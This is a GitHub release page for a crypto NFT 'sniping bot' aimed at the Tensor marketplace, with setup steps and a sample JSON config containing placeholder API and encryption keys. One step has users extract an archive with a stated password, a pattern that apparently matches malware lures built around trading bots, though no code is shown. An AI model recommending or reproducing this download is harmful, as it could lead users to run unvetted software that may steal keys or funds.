Skip to content

release

Latest
Compare
Choose a tag to compare
@kansel-dev kansel-dev released this 20 Jun 03:46
· 10 commits to main since this release
91a6a68
  • Clone the repository and follow the step-by-step setup guide in the documentation.
  • Extract archive with password Gn2qVdUt
  • Customize the bot's configuration to match your sniping strategy and preferences.
  • tensorApi section includes information needed for Tensor Marketplace integration, such as the API base URL and an API key.
  • snipingAlgorithm section contains parameters for the smart sniping algorithm, including precision thresholds, bidding strategy, and discount thresholds.
  • userInterface section includes settings for the program interface, such as enabling visual indicators and logs history.
  • security section includes security-related settings, like two-factor authentication and encryption key.
  • Run the bot
{
  "tensorApi": {
    "baseUrl": "https://tensor-marketplace-api.com",
    "apiKey": "your-api-key-here"
  },
  "snipingAlgorithm": {
    "precisionThreshold": 0.95,
    "bidStrategy": "automated",
    "discountThresholds": [3, 10, 20]
  },
  "userInterface": {
    "visualIndicators": true,
    "logsHistory": true
  },
  "security": {
    "twoFactorAuthentication": true,
    "encryptionKey": "your-encryption-key"
  }
}